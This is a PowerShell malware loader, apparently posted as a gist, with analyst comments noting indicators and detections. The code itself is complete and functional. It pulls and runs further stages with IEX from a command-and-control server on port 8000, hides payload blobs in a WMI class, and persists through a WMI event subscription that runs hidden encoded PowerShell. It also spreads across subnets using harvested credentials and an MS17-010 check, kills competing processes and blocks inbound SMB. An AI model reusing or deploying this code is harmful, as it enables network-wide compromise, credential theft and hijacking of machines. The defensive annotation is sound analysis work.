@vexx32
Created June 25, 2018 14:51
# Stage-1 loader. The broken-up string literals ('updat'+'e.w'+...) and the stray
# backticks inside cmdlet names (teSt-`Co`NNec`TIoN is Test-Connection) are no-ops to
# the parser; they exist only to defeat static signatures, so normalise the script
# before deriving detections from it.
# Candidate command-and-control endpoints: two host names and one IP literal.
$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215'))
# Fallback endpoint, used if none of the candidates answers a ping.
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub')
# Keep the first candidate that replies to Test-Connection; the ICMP echo from this
# host to each C2 name is the first observable network artifact.
foreach($t in $se)
{
$pin=teSt-`Co`NNec`TIoN $t
if ($pin -ne $null)
{
$nic=$t
break
}
}
# All later downloads go to <host>:8000 over plain HTTP.
$nic=$nic+(':80'+'00')
# On 64-bit Windows a different stage (info6.ps1) is fetched and run in memory with
# Invoke-Expression and this file stops here; everything below is the non-64-bit path.
if ((GeT`-wmI`oBJEcT Win32_OperatingSystem).osarchitecture.contains('64'))
{
I`Ex(n`Ew`-ObJEct Net.WebClient).DownloadString("http://$nic/info6.ps1")
return
}
# De-scrambles a payload string: splits it into 1000-character blocks, emits the
# complete blocks in reverse order, then appends the trailing partial block unchanged.
# The delivering stage presumably stored the payload with its blocks reversed so the
# raw blob does not match file-based signatures.
# Arguments: $a - scrambled string
# Outputs:   the re-ordered string
function reload ($a){
$b=""
# Number of complete 1000-character blocks.
$size=[Math]::Floor($a.length/1000)
for($i=$size-1;$i -ge 0;$i--)
{
$b+=$a.Substring($i*1000,1000)
}
# The remainder (fewer than 1000 characters) keeps its position at the end.
$b+=$a.Substring($size*1000)
return $b
}
# $fa is never assigned in this listing; presumably the delivering stage prepends it
# (one large string holding all the embedded payloads). Unscramble it first.
$fa=r`elOAD $fa
# Carve four blobs out of the unscrambled string at fixed offsets. From their use
# below: $funs is Base64 PowerShell that is decoded and executed (helper functions),
# $sc is Base64 of a byte array handed to eb7/eb8 after the m17sc check, $mimi is
# passed to Get-creds and $mon to $RemoteScriptBlock in the embedded stage. The names
# suggest a credential dumper, a miner and shellcode, but that is inferred from naming
# only.
$mimi = $fa.SubString(0, 944812)
$mon = $fa.SubString(944818, 570712)
$funs = $fa.SubString(1515531, 519596)
$sc = $fa.SubString(2035144, 3264)
# Fileless storage: create the WMI class 'root\default:coredpussvr' ('root{0}default'
# with [char]92 is a backslash) and park every blob in a class property. Nothing is
# written to disk; the WMI repository is the only artifact. The class name is a
# reliable indicator of compromise and deleting the class is part of remediation.
try{
$StaticClass = NEw-O`B`jECT Management.ManagementClass((('root'+'{0}def'+'aul'+'t') -f[CHAr]92), $null,$null)
$StaticClass.Name = ('co'+'red'+'pussvr')
$StaticClass.Put() | oUt`-NUll
$StaticClass.Properties.Add(('mi'+'mi') , $mimi)
$StaticClass.Put() | oU`T-nUll
$StaticClass.Properties.Add(('m'+'on') , $mon)
$StaticClass.Put() | out`-N`ULl
$StaticClass.Properties.Add(('fu'+'ns') , $funs)
$StaticClass.Put() | Out`-nu`LL
$StaticClass.Properties.Add('sc' , $sc)
$StaticClass.Put() | out`-NULL
# 'ipsu' and 'i17' start as a single space and accumulate space-separated addresses
# of hosts already handled; the embedded stage writes them back after each run.
$StaticClass.Properties.Add(('i'+'psu') ," ")
$StaticClass.Put() | OU`T-`NuLL
$StaticClass.Properties.Add(('i'+'17') ," ")
$StaticClass.Put() | O`UT-`NuLl
# 'ver' is compared by the embedded stage against http://<c2>:8000/ver.txt to decide
# whether to pull an update (info3.ps1).
$StaticClass.Properties.Add(('v'+'er'), ('1'+'.4'))
$StaticClass.Put() | out`-NuLl
} catch {
# Reached when creating or putting the class fails -- presumably because the class
# already exists from an earlier run. In that case do one immediate spreading sweep.
# Decode and execute the helper-function blob; Get-NetworkRange, eb7, eb8 and the
# [PingCastle.Scanners.m17sc] type used below are not defined in this file and
# presumably come from here.
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
I`Ex $defun
$Networks = GET-`Wm`iOb`Ject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
[byte[]]$sc=[System.Convert]::FromBase64String($sc)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IpAddress[0]
# Skip APIPA (169.254.x.x) adapters. The pattern is a regex, so the '.' is unescaped.
if ($IPAddress -match ('^1'+'69.254')){continue}
$SubnetMask = $Network.IPSubnet[0]
# Every address in the adapter's subnet becomes a target...
$ips=ge`T`-nETwoRKr`ANGe $IPAddress $SubnetMask
# ...plus the remote end of every ESTABLISHED TCP connection in netstat output, except
# loopback. Rows are split on spaces; [-3] is the foreign-address column, [-2] the state.
$tcpconn = N`E`TsTat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq ('ESTA'+'BL'+'ISHED')) -and ($i -ne ('1'+'2'+'7.0.0.1')) -and ($ips -notcontains $i))
{
$ips+=$i
}
}
# 5400 s (90 min) budget measured from $stime. NOTE(review): $stime is only assigned
# inside the embedded stage further down, never in this outer script, so here it is
# $null and the test appears to reduce to TickCount/1000 -gt 5400, i.e. "uptime over
# 90 minutes" -- on such hosts this sweep exits at once. Confirm before relying on it.
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
# Ping sweep, then a scan with the PingCastle m17sc class (by its name an MS17-010,
# i.e. SMB, check); hosts it reports vulnerable get eb7 and, if that returns anything
# but $true, eb8 with the $sc byte array. On the wire expect ICMP followed by 445/tcp
# from powershell.exe. $ipsu and $i17 are not read back from the class in this branch,
# so both are empty here.
if ((TEST`-c`O`NNect`ioN $ip -count 1) -ne $null -and $ipsu -notcontains $ip)
{
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=E`B7 $ip $sc
if (!($res -eq $true))
{e`B8 $ip $sc}
# Record the host so later runs (the embedded stage) skip it.
$i17 = $i17 + " "+$ip
}
}
}
}
}
# Names of the WMI event filter and consumer created further down; both are
# searchable artifacts in root\subscription.
$filterName = ('S'+'ystem Ev'+'ents '+'L'+'og F'+'ilter')
$consumerName = ('S'+'y'+'st'+'em Eve'+'nts Log '+'Consumer')
# The persistent stage, kept un-obfuscated inside a literal here-string (no expansion;
# nothing may be inserted between the @' and '@ markers). It is Base64-encoded below,
# executed by the WMI CommandLineEventConsumer on every trigger, and once directly at
# the end of this file. In order it:
#  - re-selects the C2 host and compares http://<c2>:8000/ver.txt with the 'ver'
#    property of root\default:coredpussvr; on mismatch it executes info3.ps1 and stops;
#  - records $stime and executes the 'funs' property (helper functions);
#  - deletes every __FilterToConsumerBinding whose filter is not 'System Events Log',
#    i.e. evicts other WMI-subscription persistence;
#  - checks whether the busiest powershell.exe holds an ESTABLISHED connection on
#    :80 or :14444 (its own earlier instance), calls KillBot('coredpussvr'), and kills
#    any process with an ESTABLISHED connection on the listed ports (:1111 ... :55335)
#    -- presumably competing miners;
#  - if no instance is running and at most eight powershell.exe processes exist, starts
#    a hidden powershell that feeds the 'mon' blob to $RemoteScriptBlock;
#  - runs Get-creds on the 'mimi' blob, then for every non-APIPA adapter sweeps the
#    subnet plus netstat peers: test-ip with the harvested credentials first, otherwise
#    the m17sc / eb7 / eb8 path with the 'sc' bytes, within a 5400 s budget;
#  - writes the updated 'ipsu' and 'i17' host lists back to the WMI class.
# Detection: this stage is what appears in process-creation logs as
# powershell.exe -NoP -NonI -W Hidden -E <base64>, typically parented by WmiPrvSE.exe.
$Script=@'
$se=@('update.windowsdefenderhost.club','info.windowsdefenderhost.club','87.121.98.215')
$nic='www.windowsdefenderhost.club'
foreach($t in $se)
{
$pin=test-connection $t
if ($pin -ne $null)
{
$nic=$t
break
}
}
$nic=$nic+":8000"
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
if($ver -ne ([WmiClass] 'root\default:coredpussvr').Properties['ver'].Value){
IEX (New-Object Net.WebClient).DownloadString("http://$nic/info3.ps1")
return
}
}
$stime=[Environment]::TickCount
$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'System Events Log'} |Remove-WmiObject
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
{
$exist=$true
break
}
}
}
KillBot('coredpussvr')
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":14433") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335")))
{
$evid=$line[-1]
Get-Process -id $evid | stop-process -force
}
}
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell
$vbs.run($cmdmon,0)
}
$NTLM=$False
$mimi = ([WmiClass] 'root\default:coredpussvr').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
$ipsu = ([WmiClass] 'root\default:coredpussvr').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:coredpussvr').Properties['i17'].Value
$scba= ([WmiClass] 'root\default:coredpussvr').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IpAddress[0]
if ($IPAddress -match '^169.254'){continue}
$SubnetMask = $Network.IPSubnet[0]
$ips=Get-NetworkRange $IPAddress $SubnetMask
$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
{
$ips+=$i
}
}
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip)
{
$re=0
if ($a.count -ne 0)
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
else
{
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq $true))
{eb8 $ip $sc}
$i17 = $i17 + " "+$ip
}
}
}
}
}
$StaticClass=New-Object Management.ManagementClass('root\default:coredpussvr')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
'@
# Encode the embedded stage the way powershell.exe -E expects it: UTF-16LE, then Base64.
$Scriptbytes = [System.Text.Encoding]::Unicode.GetBytes($Script)
$EncodedScript=[System.Convert]::ToBase64String($Scriptbytes)
# Trigger query, after the 'tMr' -> [char]39 (single quote) substitution:
#   SELECT * FROM __InstanceModificationEvent WITHIN 5600
#   WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
# That perf-counter instance changes constantly, so in practice the consumer fires on
# every 5600 s (~93 min) polling interval.
$Query = (('SELECT * FROM __Insta'+'nceModif'+'icat'+'ionE'+'vent WITH'+'IN 56'+'00'+' WHERE'+' T'+'arge'+'tInstance I'+'S'+'A tMrWin32_Perf'+'F'+'o'+'rma'+'ttedDa'+'ta_Perf'+'OS_Syst'+'em'+'tMr') -REplACE 'tMr',[chAr]39)
# Tear down any existing binding / filter / consumer with these names so the
# subscription is re-created cleanly ([char]39 again stands in for the quotes).
gE`T-`w`MiObjecT -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter (('__P'+'a'+'t'+'h LI'+'KE '+'{0}%System Events'+' L'+'og Consu'+'mer%{0}') -f[ChAR]39) | reM`OVE`-w`mIoBjE`CT
Get`-wMiObje`cT -Namespace root\Subscription -Class __EventFilter -filter (('name= 9MQSy'+'ste'+'m '+'Even'+'ts'+' L'+'og F'+'ilter9'+'MQ')-cREplacE ([ChAR]57+[ChAR]77+[ChAR]81),[ChAR]39) |REMOV`E-w`m`IobjE`CT
GE`T-`wm`iO`BJeCt -Namespace root\Subscription -Class CommandLineEventConsumer -Filter (('Name'+'={0'+'}System Eve'+'nt'+'s Log Consumer'+'{0}') -F [char]39) | r`eMoVE-WMiOb`jECT
# Host firewall change through the legacy IPsec policy engine: policy 'netbc' with
# filter list / action 'block' drops inbound TCP 445 to this machine -- presumably to
# keep other SMB-borne malware off a host this one already holds. The policy is left
# assigned, so it is a persistent artifact that must be unassigned and deleted during
# cleanup (and it will silently break legitimate inbound SMB until then).
nE`Tsh ipsec static add policy name=netbc
N`eTSh ipsec static add filterlist name=block
ne`Tsh ipsec static add filteraction name=block action=block
n`eTsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
n`eTSh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
Net`SH ipsec static set policy name=netbc assign=y
# WMI event-subscription persistence in root\subscription ('ro'+'ot5Gi...' and
# 'root{0}subscription' both resolve to root\subscription): an __EventFilter holding
# the WQL query above, a CommandLineEventConsumer that runs
# powershell.exe -NoP -NonI -W Hidden -E <encoded stage>, and the binding between
# them. Sysmon event IDs 19/20/21 (WmiEventFilter / WmiEventConsumer /
# WmiEventConsumerToFilter) and Microsoft-Windows-WMI-Activity/Operational 5861 record
# exactly these three creations.
$FilterParams = @{
Namespace = (('ro'+'ot5Gis'+'ubscr'+'ipti'+'on') -cREPlAce ([chAR]53+[chAR]71+[chAR]105),[chAR]92)
Class = ('__Ev'+'entF'+'ilter')
Arguments =@{Name=$filterName;EventNameSpace=(('r'+'oot{0}cimv2') -f[CHaR]92);QueryLanguage=('WQ'+'L');Query=$Query}
ErrorAction = ('Silently'+'Continu'+'e')
}
$WMIEventFilter = Set-`WmIINs`Ta`NcE @FilterParams
$ConsumerParams = @{
Namespace = (('root{'+'0}'+'subscription')-f[ChaR]92)
Class = ('Comm'+'andLi'+'neEventConsu'+'m'+'er')
Arguments =@{ Name = $consumerName; CommandLineTemplate=('p'+'o'+'wershell.e'+'xe -NoP'+' -N'+'o'+'n'+'I'+' -W Hidde'+'n -E ')+"$EncodedScript"}
ErrorAction = ('S'+'ilentlyC'+'onti'+'nue')
}
$WMIEventConsumer = s`et-Wm`i`InsTANce @ConsumerParams
SeT`-WMI`In`ST`Ance -Class __FilterToConsumerBinding -Namespace (('root'+'RB2su'+'bscri'+'pti'+'on').REPLaCE('RB2',[STRinG][CHaR]92)) -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} | OU`T`-NUll
# Clean-up of what look like an earlier variant's artifacts: a scheduled task named
# 'yastcat' and %SystemRoot%\temp\y1.bat ('WXU' / 'THl' are replaced by a backslash).
Sc`hTaSKS /delete /tn yastcat /f
if (TEs`T-p`ATH ($env:SystemRoot+(('WXUt'+'empW'+'XUy1'+'.'+'b'+'at').rEpLace('WXU',[sTRiNG][cHaR]92)))){R`emO`V`e-ItEM -Path ($env:SystemRoot+(('T'+'Hl'+'tempTHly'+'1.bat').REpLacE('THl',[StrInG][chAr]92))) -Force}
# Keep the host awake so the payload is never suspended: no standby or hibernate on AC
# power, and the SetAcValueIndex GUIDs appear to set the lid-close action of the
# Balanced plan to 0 ("do nothing") -- confirm against powercfg's GUID listing.
po`w`ErCFG /CHANGE -standby-timeout-ac 0
P`OwERCFG /CHANGE -hibernate-timeout-ac 0
pO`we`RCfG -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
# If the powershell.exe using the most CPU holds an ESTABLISHED connection on :80 or
# :14444 (presumably an older running copy of the persistent stage), kill it before the
# new copy starts. Same netstat row parsing as in the sweep above: [-1] is the PID.
[array]$psids= g`E`T-PROc`eSS -name powershell |sO`Rt cpu -Descending| FOreAC`H-`Obj`Ect {$_.id}
$tcpconn = NE`Tst`At -anop tcp
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains(('ES'+'T'+'ABLI'+'SHED')) -and ($t.contains((':8'+'0 ')) -or $t.contains((':'+'14444'))) )
{
geT`-p`ROcESs -id $psids[0] | stop-P`Roc`ESs -force
break
}
}
}
# Run the persistent stage once immediately instead of waiting for the first WMI
# trigger ($script and $Script are the same variable; names are case-insensitive).
i`ex $script